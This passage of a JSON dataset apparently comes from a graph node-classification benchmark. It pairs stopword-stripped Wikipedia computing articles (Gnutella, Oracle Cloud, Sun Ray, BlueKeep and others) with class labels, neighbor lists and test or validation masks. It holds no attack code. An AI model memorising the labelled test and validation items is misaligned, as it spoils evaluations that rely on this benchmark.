considered equal nodes entering network kept 'edge network leaf responsible routing nodes capable routing messages promoted ultrapeers would accept leaf connections route searches network maintenance messages allowed searches propagate network allowed numerous alterations topology improved efficiency scalability greatly additionally gnutella adopted number techniques reduce traffic overhead make searches efficient notable query routing protocol qrp dynamic querying dq qrp search reaches clients likely files rare files searches grow vastly efficient dq search stops soon program acquired enough search results vastly reduces amount traffic caused popular searches gnutella users vast amount information improvements gnutella user-friendly style one benefits gnutella decentralized make difficult shut network make network users ones decide content available unlike napster entire network relied central server gnutella shut shutting one node impossible company control contents network also due many free open source gnutella clients share network gnutella operate purely query flooding-based protocol outdated gnutella version 0.4 network protocol employs five different packet types namely mainly concerned searching gnutella network file transfers handled using http development gnutella protocol currently led gnutella developers forum gdf many protocol extensions developed software vendors free gnutella developers gdf extensions include intelligent query routing sha-1 checksums query hit transmission via udp querying via udp dynamic queries via tcp file transfers via udp xml metadata source exchange also termed download mesh parallel downloading slices swarming efforts finalize protocol extensions gnutella 0.6 specification gnutella protocol development website gnutella 0.4 standard although still latest protocol specification since extensions exist proposals far outdated fact hard impossible connect today 0.4 handshakes according developers gdf version 0.6 new developers pursue using work-in-progress specifications gnutella protocol remains development spite attempts make clean break complexity inherited old gnutella 0.4 design clean new message architecture still one successful file-sharing protocols date following tables compare general technical information number applications supporting gnutella network tables attempt give complete list gnutella clients tables limited clients participate current gnutella network gnutella2 protocol often referred g2 despite name successor protocol gnutella related original gnutella project rather completely different protocol forked original project piggybacked gnutella name sore point many gnutella developers gnutella2 name conveys upgrade superiority led flame war criticism included use gnutella network bootstrap g2 peers poor documentation g2 protocol additionally frequent search retries shareaza client one initial g2 clients could unnecessarily burden gnutella network protocols undergone significant changes since fork 2002 g2 advantages disadvantages compared gnutella advantage often cited gnutella2 hybrid search efficient original gnutella query flooding later replaced efficient search methods starting query routing 2002 proposed 2001 limewire developers advantage gnutella users number millions whereas g2 network approximately order magnitude smaller difficult compare protocols current form individual client choice probably much effect end user either network",
    "neighbors": [
      5251,
      4229,
      6534,
      4490,
      6797,
      11029,
      1558,
      3350,
      11413,
      10522,
      5405,
      3366,
      8998,
      10924,
      10807,
      3770,
      10173,
      8640,
      11073,
      708,
      6351,
      3792,
      6991,
      6993,
      7761,
      3676,
      5085,
      5086,
      479,
      5470,
      3428,
      3813,
      10341,
      488,
      5612,
      877,
      7921,
      1908,
      4725,
      5749,
      1015,
      9332,
      7802
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4230,
    "label": 2,
    "text": "Henry_Poole_(technologist):henry poole technologist henry poole technologist social entrepreneur ceo civicactions board member free software foundation co-founded one first digital agencies vivid studios 1993 year served technical editor book demystifying multimedia 1994 led project study social interactions use technology well community 1995 firm managed online launch microsoft windows 95 largest online technology product introduction time 2000 poole joined ceo french gnu/linux publisher mandrakesoft 2001 poole founded first opensaas enterprise affero inc. 2002 published affero general public license version 1 poole joined board free software foundation december 2002 2003 poole managed digital team kucinich us president 2004 founded government digital services firm civicactions may 2006 poole free software foundation launched anti-drm campaign defective design software freedom activist poole organized fundraisers dmitry sklyarov free software foundation signatory 9/11 truth statement",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      802,
      3618,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      10192,
      8147,
      3674,
      2010,
      10464,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "Test"
  },
  {
    "node_id": 4231,
    "label": 2,
    "text": "Dynamic_Language_Runtime:dynamic language runtime dynamic language runtime dlr microsoft runs top common language runtime clr provides computer language services dynamic languages services include dlr used implement dynamic languages .net framework including ironpython ironruby projects dynamic language implementations share common underlying system easier interact one another example possible use libraries dynamic language dynamic language addition hosting api allows interoperability statically typed cli languages like c visual basic .net microsoft dynamic language runtime project announced microsoft mix 2007 microsoft shipped .net dlr 0.9 beta november 2008 final 0.9 december 2008 version 1.0 shipped april 2010 july 2010 microsoft changed license dlr microsoft public license apache license v2.0 release .net 4 also april 2010 dlr incorporated .net framework open source dlr project hosted github additional features language implementers activity project since july 2010 release could linked including microsoft developer worked ironruby saw lack commitment microsoft dynamic languages .net framework dlr services currently used development version ironruby .net implementation ruby language ironpython 2007 microsoft planned use dlr upcoming visual basic 2010 vb 10.0 managed jscript ecmascript 3.0 however august 2009 microsoft plans implement managed jscript ecmascript 3.0 dlr like c visual basic access objects dynamic languages built dlr ironpython ironruby powershell 3.0 released windows 8 updated use dlr ironscheme upcoming scheme implementation planning build upon dlr idea abandoned dlr branch used project became sync trunk also according project coordinator current version dlr time could support majority scheme requirements dynamic language runtime built idea possible implement language specificities top generic language-agnostic abstract syntax tree whose nodes correspond specific functionality common many dynamic languages architecture backed idea number elementary language constructs would implemented generic stack inherently limited dlr dynamically generates code corresponding functionality expressed nodes compiler dynamic language implemented top dlr generate dlr abstract trees hand dlr libraries dlr provides dynamically-updated codice_1 objects cache task binding methods objects since type object—as well members contains—in dynamic languages change program lifetime method invocation must check method list see invocation valid one codice_1 objects represent cache state object methods update object reflected codice_1 objects well dlr routes method invocations via codice_1 objects performs fast lookup binding method actual implementation contrast efforts like parrot virtual machine dependencies da vinci machine built java jvm adding new bytecodes jvm instruction set dlr built top existing common language runtime .net framework virtual machine",
    "neighbors": [
      10624,
      9348,
      8854,
      11670,
      3224,
      10011,
      3997,
      4384,
      11559,
      2603,
      7983,
      9263,
      1591,
      1347,
      1348,
      9808,
      11221,
      9434,
      2011,
      603,
      2145,
      10083,
      3821,
      3573,
      4853,
      9726
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4232,
    "label": 4,
    "text": "De-identification:de-identification de-identification process used prevent someone personal identity revealed example data produced human subject research might de-identified preserve privacy research participants applied metadata general data identification process also known data anonymization common strategies include deleting masking personal identifiers personal name suppressing generalizing quasi-identifiers date birth reverse process using de-identified data identify individuals known data re-identification successful re-identifications cast doubt de-identification effectiveness systematic review fourteen distinct re-identification attacks found high re-identification rate … dominated small-scale studies data de-identified according existing standards de-identification adopted one main approaches data privacy protection commonly used fields communications multimedia biometrics big data cloud computing data mining internet social networks audio–video surveillance survey conducted census collect information group people encourage participation protect privacy survey respondents researchers attempt design survey way people participate survey result published possible match participant individual response data published result online shopping website wants know users preferences shopping habits decides retrieve customers data database analysis personal data information including personal identifiers collected directly customers created accounts website needs pre-handle data de-identification techniques analyzing data records avoid violating customers privacy anonymization refers irreversibly severing data set identity data contributor study prevent future re-identification even study organizers condition de-identification also severing data set identity data contributor may include preserving identifying information re-linked trusted party certain situations debate technology community whether data re-linked even trusted party ever considered de-identified common strategies de-identification masking personal identifiers generalizing quasi-identifiers pseudonymization main technique used mask personal identifiers data records k-anonymization usually adopted generalizing quasi-identifiers pseudonymization performed replacing real names temporary id deletes masks personal identifiers make individuals unidentified method makes possible track individual record time even though record updated however prevent individual identified specific combinations attributes data record indirectly identify individual k-anonymization defines attributes indirectly points individual identity quasi-identifiers qis deal data making least k individuals combination qi values qi values handled following specific standards example k-anonymization replaces original data records new range values keep values unchanged new combination qi values prevents individual identified also avoid destroying data records research de-identification driven mostly protecting health information libraries adopted methods used healthcare industry preserve readers privacy big data de-identification widely adopted individuals organizations.with development social media e-commerce big data de-identification sometimes required often used data privacy users personal data collected companies third-party organizations analyze personal usage smart cities de-identification may required protect privacy residents workers visitors without strict regulation de-identification may difficult sensors collect information without consent whenever person participates genetics research donation biological specimen often results creation large amount personalized data data uniquely difficult de-identify anonymization genetic data particularly difficult huge amount genotypic information biospecimens ties specimens often medical history advent modern bioinformatics tools data mining demonstrations data individuals aggregate collections genotypic data sets tied identities specimen donors researchers suggested reasonable ever promise participants genetics research retain anonymity instead participants taught limits using coded identifiers de-identification process may 2014 united states president council advisors science technology found de-identification somewhat useful added safeguard useful basis policy robust near‐term future re‐identification methods hipaa privacy rule provides mechanisms using disclosing health data responsibly without need patient consent mechanisms center two hipaa de-identification standards – safe harbor expert determination method safe harbor relies removal specific patient identifiers e.g name phone number email address etc expert determination method requires knowledge experience generally accepted statistical scientific principles methods render information individually identifiable safe harbor method uses list approach de-identification two requirements expert determination takes risk-based approach de-identification applies current standards best practices research determine likelihood person could identified protected health information method requires person appropriate knowledge experience generally accepted statistical scientific principles methods render information individually identifiable requires key law research electronic health record data hipaa privacy rule law allows use electronic health record deceased subjects research hipaa privacy rule section 164.512 1 iii",
    "neighbors": [
      7781,
      4749,
      3858,
      10102,
      8471
    ],
    "mask": "Test"
  },
  {
    "node_id": 4233,
    "label": 8,
    "text": "Oracle_Application_Server:oracle application server oracle application server 10g g stands grid short oracle consists integrated standards-based software platform forms part oracle corporation fusion middleware technology stack heart oracle application server consists oracle http server based apache http server oc4j oracleas containers java ee deploys java ee-based applications version oc4j offers full compatibility java ee 1.4 specifications oracle application server became first platform designed grid computing well full life-cycle support service-oriented architecture soa release oracle application server 10g r3 feature metadata repository tier relying instead metadata repositories provided previous releases following oracle acquisition bea systems “ key features integrated weblogic server seamless migration ” oracle corporation marketed first application server using name oracle web server ows subsequent repackaging resulted oracle application server oas later product superseding oas became internet application server oracle corporation subdivides products varying editions — apparently facilitate marketing license-tracking available oracle editions include oracle corporation refers implementation java ee specification oracle containers j2ee abbreviates concept oc4j oc4j originally based ironflare orion application server developed solely oracle control since oracle corporation acquired source code oc4j includes following servers oracle application server utilize oracle infrastructure database — oracle database instance supporting oracle metadata repository and/or oracle identity management opmn oracle process management notification server monitors components oracle application server opmnctl command starts stops monitors oracle components",
    "neighbors": [
      865,
      8994,
      5956,
      3558,
      7175,
      3560,
      7944,
      4107,
      5612,
      9867,
      6286,
      7983,
      10193,
      6067,
      1367,
      10553,
      3517,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 4234,
    "label": 4,
    "text": "LogLogic:loglogic loglogic technology company specializes security management compliance reporting operations products loglogic developed first appliance-based log management platform loglogic log management platform collects correlates user activity event data loglogic products used many world largest enterprises rapidly identify alert compliance violations policy breaches cyber attacks insider threats loglogic founded 2002 jason destefano thomas grabowski peter jordan minneapolis mn company established help system administrators automate management log data diagnose system problems 2009 loglogic released database security compliance management products acquired security information event management siem company 2012 company acquired tibco loglogic makes computer appliance system administrators compliance managers cios cisos use collect logs events network devices servers databases operating systems applications appliances also translate various log formats search logs generate alerts create graphs logging trends loglogic products help several industry compliance mandates standards payment card industry data security standard pci dss health insurance portability accountability act hipaa sarbanes-oxley sox focus ventures sequoia capital telesoft partners worldview technology partners invesco private capital sap ventures cm-cic private equity crédit agricole private equity elaia partners",
    "neighbors": [
      11429,
      2765,
      3827,
      11542,
      8471,
      5210
    ],
    "mask": "None"
  },
  {
    "node_id": 4235,
    "label": 3,
    "text": "Sun_Ray:sun ray sun ray oracle stateless thin client solution aimed corporate environments originally introduced sun microsystems september 1999 discontinued oracle 2014 featured smart card reader several models featured integrated flat panel display idea stateless desktop significant shift eventual successor sun earlier line diskless java-only desktops javastation concept began sun microsystems laboratories 1997 project codenamed networkterminal newt client designed small low cost low power silent based sun microelectronics microsparc iiep processors initially considered included intel strongarm philips semiconductors trimedia national semiconductors geode microsparc iiep selected high level integration good performance low cost general availability newt included 8 mb edo dram 4 mb flash graphics controller used ati rage 128 low power 2d rendering performance low cost also included ati video encoder tv-out removed sun ray 1 philips semiconductor saa7114 video decoder/scaler crystal semiconductor audio codec sun microelectronics ethernet controller pci usb host interface 4 port hub i²c smart card interface motherboard daughtercard housed off-the-shelf commercial small form-factor pc case internal +12/+5vdc auto ranging power supply newt designed much feature parity modern business pc every way possible client n't use commercial operating system instead used real-time exec originally developed sun labs part ethernet-based security camera project codenamed netcam less 60 newt ever built survived however one collection computer history museum mountain view california july 2013 reports circulated oracle ending development sun ray related products scott mcnealy long-time ceo sun tweeted official announcement made august 1 2013 last order february 2014 support hardware maintenance available 2017 contrast thick client sun ray networked display device applications running server elsewhere state user session independent display enables another feature sun ray portable sessions user go one sun ray another continue work without closing programs smart card user insert card presented session reauthentication requirement depends mode operation without smart card procedure almost identical except user must specify username well password get session either case session yet exist new one created first time user connects sun ray clients connected via ethernet network sun ray server sun ray software srs available solaris linux operating systems sun developed separate network display protocol appliance link protocol alp sun ray system vmware announced support protocol vmware view 2008 sun ray software two basic modes operation—generic session kiosk mode generic session user see solaris gnu/linux login screen operating system running srs kiosk mode log screen varies depending session type use kiosk mode used number different desktop applications oracle integrated rdp client vmware view client sun ray software used kiosk mode start full screen windows session mode window manager unix desktop started windows environment os supports rdp 2007 sun uk company thruput integrated sun ray 2fs 28 2048 × 2048 30 2560 × 1600 56 3840 × 2160 displays 2008 trialled external graphics accelerator enables sun ray used high resolution display sun ray 3 models last production—last order date february 28 2014 last ship date august 31 2014 sun oem partners produced wi-fi notebook versions sun ray sun ray 1 clients used 100mhz microsparc iiep processor initially followed custom soc version codenamed copernicus us 6993,617 b2 based microsparc iiep core added 4mb on-chip dram usb smart card interface addition memory controller pci interface already microsparc iiep sun ray 2 3 clients use mips architecture-based rmi alchemy au1550 processor pure software implementation available sun ray software 5 srs5 commercial environments sun rays commonly deployed thin client access microsoft windows desktop using srss built-in rdp client uttsc desktop terminal server session virtual machine vdi setup flexible works well many environments intermediate sun ray server layer transparent windows desktop time however transparency also become issue software location dependent location dependent information needs added possible extend functionality sun ray software additional custom scripts sun ray wiki offers follow printing setup example e.g user always gets nearest printer default printer going room-to-room location-to-location also inside windows session relatively easy administrator extend add functionality required",
    "neighbors": [
      3328,
      9090,
      9731,
      8327,
      1801,
      6153,
      6797,
      1809,
      4241,
      9745,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      5375,
      1316,
      10789,
      1707,
      2731,
      5677,
      3247,
      6322,
      2871,
      823,
      4664,
      4285,
      6464,
      7104,
      6338,
      7234,
      9665,
      10436,
      8007,
      1480,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      11626,
      7148,
      7022,
      1776,
      5233,
      5872,
      8179,
      11636,
      9333,
      631,
      11129,
      10747,
      1788,
      1406,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 4236,
    "label": 7,
    "text": "Oracle_Cloud:oracle cloud oracle cloud cloud computing service offered oracle corporation providing servers storage network applications services global network oracle corporation managed data centers company allows services provisioned demand internet oracle cloud provides infrastructure service iaas platform service paas software service saas data service daas services used build deploy integrate extend applications cloud platform supports numerous open standards sql html5 rest etc open-source solutions kubernetes hadoop kafka etc variety programming languages databases tools frameworks including oracle-specific open source third-party software systems oracle branded infrastructure service oracle cloud infrastructure oci oracle cloud infrastructure offerings include following services oracle announced generation 2 cloud oracle openworld 2018 oracle branded platform service oracle cloud platform ocp oracle cloud platform offerings include following services july 28 2016 oracle bought netsuite first cloud company 9.3 billion may 16 2018 oracle announced acquired datascience.com privately held cloud workspace platform data science projects workloads oracle provides saas applications also known oracle cloud applications applications offered across variety products industrial sectors various deployment options adhere compliance standards list mentions oracle cloud applications provided oracle corporation platform known oracle data cloud platform aggregates analyzes consumer data powered oracle id graph across channels devices create cross-channel consumer understanding oracle cloud deployed public cloud private cloud hybrid cloud deployment models oracle cloud offered global network oracle corporation managed data centers oracle corporation deploys cloud regions inside region least three fault-independent availability domains availability domains contains independent data center power thermal network isolation oracle cloud generally available north america emea apac japan announced south america us gov regions coming soon oracle developers forum responsible engaging developer community provides information documentation discussion authored oracle community members large oracle offers certifications infrastructure service iaas platform service paas several specializations software service",
    "neighbors": [
      1539,
      526,
      3086,
      4623,
      530,
      10265,
      5662,
      5666,
      9766,
      39,
      5159,
      3121,
      5681,
      10820,
      8262,
      4683,
      590,
      1102,
      7248,
      5202,
      5210,
      1628,
      4194,
      5732,
      10340,
      2170,
      11392,
      6797,
      10893,
      8353,
      6307,
      2217,
      10413,
      9906,
      7352,
      3262,
      4289,
      3269,
      1224,
      6367,
      2795,
      3819,
      3323,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      11070,
      8515,
      8520,
      4429,
      1362,
      2901,
      7512,
      9562,
      4958,
      3428,
      10090,
      8044,
      5499,
      11646,
      6018,
      6027,
      7054,
      911,
      1935,
      8591,
      8592,
      405,
      2965,
      11692,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      7660,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 4237,
    "label": 3,
    "text": "Processor_supplementary_capability:processor supplementary capability processor supplementary capability feature added existing central processing unit cpu design initial introduction design marketplace supplementary capability increases usefulness processor design allowing compete favorably competitors giving consumers reason upgrade retaining backwards compatibility original design cpu supplementary instruction capability rule apply 8 16 bit cpus many cpus used mostly microcontrollers modern 32 64 bit cpus processor supplementary capability extend floating point units fpus memory management units mmus considered fundamental core functionalities extensions core functionalities mmu fpu may considered cpu extensions however supplementary instructions feature always assumed mean fixed sets instructions obligatory across cpus cpu family supplementary instructions simply found processors within family programmer wishes use supplementary feature cpu faced couple choices supplemental instruction programming options needed instructions fall back presumably slower otherwise less desirable alternative technique initiated else program may set run reduced functionality using lowest common denominator strategy avoiding use processor supplementary capabilities programs kept portable across machines architecture popular processor architectures x86 68000 mips seen many new capabilities introduced several generations design capabilities seen widespread adoption programmers spurring consumer upgrades making previous generations processors obsolete processor supplementary instructions instructions implemented certain processors within family present processors within particular family following instructions considered processor supplementary instructions ia-32 architecture instructions added later production processors part original ia-32 instruction set programs containing instructions may operate correctly machines ia-32 family fpu floating point unit maths co-processing capability available x86 processors since 80486dx series fpu mmu instruction sets x86 family considered supplementary instructions since introduction due importance core cpu functionality",
    "neighbors": [
      5380,
      2821,
      4491,
      6924,
      6038,
      9369,
      9500,
      2847,
      5922,
      1915,
      2088,
      7983,
      9391,
      1461,
      8120,
      8506,
      1085,
      7997,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      6730,
      5326,
      977,
      2514,
      5844,
      7508,
      9428,
      8795,
      3294,
      2655,
      1122,
      7783,
      10985,
      9964,
      5358,
      9582,
      1776,
      8944,
      499,
      1399,
      9976,
      4603,
      10620,
      7039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4238,
    "label": 2,
    "text": "Linux-VServer:linux-vserver linux-vserver virtual private server implementation created adding operating system-level virtualization capabilities linux kernel developed distributed open-source software project started jacques gélinas maintained herbert pötzl related linux virtual server project implements network load balancing linux-vserver jail mechanism used securely partition resources computer system file system cpu time network addresses memory way processes mount denial-of-service attack anything outside partition partition called security context virtualized system within virtual private server chroot-like utility descending security contexts provided booting virtual private server simply matter kickstarting init new security context likewise shutting simply entails killing processes security context contexts robust enough boot many linux distributions unmodified including debian fedora virtual private servers commonly used web hosting services useful segregating customer accounts pooling resources containing potential security breaches save space installations virtual server file system created tree copy-on-write hard links template file system hard link marked special filesystem attribute modified securely transparently replaced real copy file linux-vserver provides two branches stable 2.2.x devel 2.3.x 2.6-series kernels single stable branch 2.4-series separate stable branch integrating grsecurity patch set also available",
    "neighbors": [
      5120,
      6150,
      4616,
      2058,
      3082,
      5139,
      10780,
      10785,
      9762,
      6180,
      8242,
      9266,
      7733,
      4161,
      5697,
      7234,
      8772,
      6213,
      5702,
      8268,
      589,
      7248,
      593,
      2645,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      2212,
      8364,
      7349,
      10933,
      5815,
      2236,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      8186,
      2278,
      233,
      7403,
      9964,
      8944,
      10482,
      2294,
      8439,
      2809,
      8700,
      5378,
      4360,
      1291,
      4367,
      8466,
      792,
      10016,
      6438,
      295,
      10537,
      7983,
      1844,
      9525,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      6988,
      10063,
      1362,
      7507,
      5975,
      11095,
      11097,
      2910,
      2409,
      10091,
      5486,
      7540,
      1399,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      5523,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      11184,
      1972,
      9655,
      5049,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      3066,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 4239,
    "label": 4,
    "text": "Security_Attribute_Modulation_Protocol:security attribute modulation protocol security attribute modulation protocol samp protocol used encode role based user based access control attributes transmission network typically embedded tcp/ip udp/ip packet application layer payload trailing afterwards sun microsystems makes brief mention samp trusted solaris 8 administration manuals case trusted solaris 8 trusted network daemon parses samp headers manages system security conjunction security provisions system",
    "neighbors": [
      5280,
      9665
    ],
    "mask": "Test"
  },
  {
    "node_id": 4240,
    "label": 4,
    "text": "BlueKeep:bluekeep bluekeep security vulnerability discovered microsoft remote desktop protocol implementation allows possibility remote code execution first reported may 2019 present unpatched windows nt-based versions microsoft windows windows 2000 windows server 2008 r2 windows 7 microsoft issued security patch including out-of-band update several versions windows reached end-of-life windows xp 14 may 2019 13 august 2019 related bluekeep security vulnerabilities collectively named dejablue reported affect newer windows versions including windows 7 recent versions windows 10 operating system well older windows versions bluekeep security vulnerability first noted uk national cyber security centre 14 may 2019 reported microsoft vulnerability named bluekeep computer security expert kevin beaumont twitter bluekeep officially tracked wormable remote code execution vulnerability u.s. national security agency issued advisory vulnerability 4 june 2019 microsoft stated vulnerability could potentially used self-propagating worms microsoft based security researcher estimation nearly 1 million devices vulnerable saying theoretical attack could similar scale eternalblue-based attacks notpetya wannacry day nsa advisory researchers cert coordination center disclosed separate rdp-related security issue windows 10 may 2019 update windows server 2019 citing new behaviour rdp network level authentication nla login credentials cached client system user re-gain access rdp connection automatically network connection interrupted microsoft dismissed vulnerability intended behaviour disabled via group policy 1 june 2019 active malware vulnerability seems publicly known however undisclosed proof concept poc codes exploiting vulnerability may available 1 july 2019 sophos british security company reported working example poc order emphasize urgent need patch vulnerability 22 july 2019 details exploit purportedly revealed conference speaker chinese security firm 25 july 2019 computer experts reported commercial version exploit may available 31 july 2019 computer experts reported significant increase malicious rdp activity warn based histories exploits similar vulnerabilities active exploit bluekeep vulnerability wild may imminent 13 august 2019 related bluekeep security vulnerabilities collectively named dejablue reported affect newer windows versions including windows 7 recent versions operating system windows 10 well older windows versions rdp protocol uses virtual channels configured pre-authentication data path client server providing extensions rdp 5.1 defines 32 static virtual channels dynamic virtual channels contained within one static channels server binds virtual channel ms_t120 channel legitimate reason client connect static channel 31 heap corruption occurs allows arbitrary code execution system level windows xp windows vista windows 7 windows server 2003 windows server 2008 windows server 2008 r2 named microsoft vulnerable attack versions newer 7 windows 8 windows 10 affected cybersecurity infrastructure security agency stated also successfully achieved code execution via vulnerability windows 2000 microsoft released patches vulnerability 14 may 2019 windows xp windows vista windows 7 windows server 2003 windows server 2008 windows server 2008 r2 included versions windows end-of-life vista xp server 2003 longer eligible security updates patch forces aforementioned ms_t120 channel always bound 31 even requested otherwise rdp server nsa recommended additional measures disabling remote desktop services associated port used requiring network level authentication nla rdp according computer security company sophos two-factor authentication may make rdp issue less vulnerable however best protection take rdp internet switch rdp needed needed make rdp accessible via vpn",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      5682,
      1608,
      3657,
      8779,
      11358,
      4703,
      8288,
      8292,
      5749,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      7337,
      9904,
      9395,
      8886,
      8386,
      3789,
      7887,
      4304,
      9432,
      4314,
      9435,
      4316,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      10747,
      1337,
      6484,
      857,
      1882,
      7515,
      9055,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      4074,
      2542,
      2041,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 4241,
    "label": 3,
    "text": "Rock_(processor):rock processor rock rock multithreading multicore sparc microprocessor development sun microsystems canceled 2010 separate project sparc t-series coolthreads/niagara family processors rock aimed higher per-thread performance higher floating-point performance greater smp scalability niagara family rock processor targeted traditional high-end data-facing workloads back-end database servers well floating-point intensive high-performance computing workloads whereas niagara family targets network-facing workloads web servers rock processor implements 64-bit sparc v9 instruction set vis 3.0 simd multimedia instruction set extension rock processor 16 cores core capable running two threads simultaneously yielding 32 threads per chip servers built rock use fb-dimms increase reliability speed density memory systems rock processor uses 65 nm manufacturing process design frequency 2.3 ghz maximum power consumption rock processor chip approximately 250 w. 16 cores rock arranged four core clusters cores cluster share 32 kb instruction cache two 32 kb data caches two floating point units sun designed chip way server workloads usually high re-utilization data instruction across processes threads low number floating-point operations general thus sharing hardware resources among four cores cluster leads significant savings area power low impact performance 2005 sun publicly disclosed feature rock processor called hardware scout hardware scout uses otherwise idle chip execution resources perform prefetching cache misses march 2006 marc tremblay vice president chief architect sun scalable systems group gave presentation xerox palo alto research center parc thread-level parallelism hardware scouting thread-level speculation multithreading technologies expected included rock processor august 2007 sun confirmed rock would first production processor support transactional memory provide functionality two new instructions introduced chkpt commit one new status register cps instruction chkpt fail_pc used begin transaction commit commit transaction transaction abort condition detected jump fail_pc issued cps used determine reason support best-effort based addition data conflicts transactions aborted reasons include tlb misses interrupts certain commonly used function call sequences difficult instructions e.g. division nevertheless many arguably fine-grained code blocks requiring synchronization could benefited transactional memory support rock processor february 2008 marc tremblay announced unique feature called out-of-order retirement isscc benefits include replacing traditional instruction window much smaller deferred queue april 2008 sun engineers presented transactional memory interface transact 2008 adaptive transactional memory test platform simulator announced made available general public shortly rock processor intended used sun proposed supernova server line details server specifications released opensolaris architecture review case fwarc/2008/761 physical resource inventory pri specification arc 2008/761 indicates supernova platforms would support ieee 1275 openfirmware platform virtualization logical domains ldoms independent system controller sc fault management architecture fma domain services fma feature originally referenced fwarc/2006/141 closed extended fwarc/2008/455 successfully diagnose pci fabric errors occur root domains arc 2008/761 indicated planned support pci express pcie hot-pluggable slots well bridge older pci extended pci-x bronze servers would support pcie slots 0-5 silver servers would support i/o boards 0-1 pcie slots 0-7 board platinum servers would support i/o boards 0-3 pcie slots 0-7 board silver-ii servers would support pcie slots 00-19 platinum-ii servers would support boards 0-7 slots 0-3 board february 2005 ceo sun microsystems scott mcnealy stated taping rock would schedule later year however tape-out ultimately delayed january 2007 april 2007 sun ceo jonathan i. schwartz blogged image bga-packaged rock chip labeled ultrasparc rk disclosed could address 256 terabytes virtual memory single system running solaris next month sun announced created rock chip could boot operating system solaris successfully august year sun released details use transactional memory rock architecture however result entirely new design given uniqueness complexity release rock delayed 2008 2009 2008 mark moir presented rock transactional memory exploit sun labs open house 2008 discussing transactional memory well scouting threads mitigated computing problems solved innovative use massive thread counts slower processors september opensolaris project began integrate code supporting rock-based supernova program january 2009 sun ceo jonathan schwartz announced rock still track 2009 release 10 march 2009 dave dice yossi lev mark moir dan nussbaum presented early experience commercial hardware transactional memory implementation fourteenth international conference architectural support programming languages operating systems asplos '09 published experience hardware transactional memory htm feature two pre-production revisions new commercial multicore processor 2009 april 20 2009 sun oracle corporation announced entered definitive agreement oracle would acquire sun june 12 posting sun blog announced technical nda-only presentation rock july 14 2009 hamburg opensolaris users group meeting 15 june 2009 new york times reported two people briefed sun ’ plans said rock project canceled sun comment two days later ee times reported sun submit paper rock nowiki hot chips 21 /nowiki leading speculation company may canceled chip 24 june 2009 presentation speculative threading parallelization featured novel pipeline architecture implemented sun rock processor 36th international symposium computer architecture 6 august 2009 support rock removed opensolaris project 13 august 2009 presentation nztm nonblocking zero-indirection transactional memory written fuad tabba mark moir james goodman andrew hay cong wang presented 21st acm symposium parallelism algorithms architectures calgary canada nzstm algorithm performance evaluated sun ’ forthcoming rock processor 11 september 2009 register reported rock processor left sparc processor roadmap shown sun customers partners 15 september 2009 paper tm_db generic debugging library transactional programs written yossi lev maurice herlihy presented eighteenth international conference parallel architectures compilation techniques pact raleigh north carolina 26 october 2009 dave dice yossi lev mark moir dan nussbaum expanded formerly published paper early experience commercial hardware transactional memory implementation presented fourteenth international conference architectural support programming languages operating systems asplos '09 january 27 2010 oracle announced completed acquisition sun 5 april 2010 dave dice yossi lev virendra marathe mark moir marek olszewski dan nussbaum released paper simplifying concurrent algorithms exploiting hardware transactional memory presented 22nd acm symposium parallelism algorithms architectures spaa 2010 5 april 2010 dave dice nir shavit released paper tlrw return read-write lock presented spaa 2010 12 may 2010 reuters reported oracle ceo larry ellison shut rock project oracle acquired sun quoting saying processor two incredible virtues incredibly slow consumed vast amounts energy hot put 12 inches cooling fans top cool processor madness continue project",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      1809,
      1818,
      8863,
      1707,
      2731,
      10926,
      3247,
      6322,
      10675,
      1461,
      4664,
      4285,
      6464,
      7104,
      9665,
      709,
      2895,
      3919,
      597,
      731,
      6107,
      2269,
      9955,
      11363,
      4581,
      7142,
      7270,
      11626,
      11636,
      1399,
      9976,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 4242,
    "label": 4,
